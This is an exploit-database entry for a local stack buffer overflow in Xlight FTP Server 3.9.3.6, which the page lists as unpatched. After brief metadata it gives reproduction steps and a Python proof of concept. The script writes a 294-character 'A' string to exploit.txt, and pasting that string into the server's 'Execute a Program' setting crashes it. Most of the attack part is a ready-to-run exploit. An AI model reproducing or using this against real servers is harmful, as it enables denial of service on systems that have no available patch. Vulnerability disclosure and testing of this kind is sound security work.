Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)

vendor:

FTP Server

by:

Yehia Elghaly

N/A

CVSS

N/A

Buffer Overflow Local

119

CWE

Product Name: FTP Server

Affected Version From: 3.9.3.6

Affected Version To: 3.9.3.6

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Professional SP3 - Windows 11 x64

2023

Xlight FTP Server 3.9.3.6 – ‘Stack Buffer Overflow’ (DOS)

Xlight FTP Server 3.9.3.6 'Execute Program' Buffer Overflow (PoC)

Mitigation:

Unknown

Source

Exploit-DB raw data:

# Exploit Title: Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)
# Discovered by: Yehia Elghaly
# Discovered Date: 2023-08-04
# Vendor Homepage: https://www.xlightftpd.com/
# Software Link : https://www.xlightftpd.com/download/setup.exe
# Tested Version: 3.9.3.6
# Vulnerability Type: Buffer Overflow Local
# Tested on OS: Windows XP Professional SP3 - Windows 11 x64

# Description: Xlight FTP Server 3.9.3.6 'Execute Program' Buffer Overflow (PoC)

# Steps to reproduce:
# 1. - Download and Xlight FTP Server
# 2. - Run the python script and it will create exploit.txt file.
# 3. - Open Xlight FTP Server 3.9.3.6
# 4. - "File and Directory - Modify Virtual Server Configuration - Advanced - Misc- Setup 
# 6. - Execute a Program after use logged in-  Paste the characters 
# 7  - Crashed

#!/usr/bin/env python3

exploit = 'A' * 294

try: 
    with open("exploit.txt","w") as file:
        file.write(exploit)
    print("POC is created")
except:
    print("POC not created")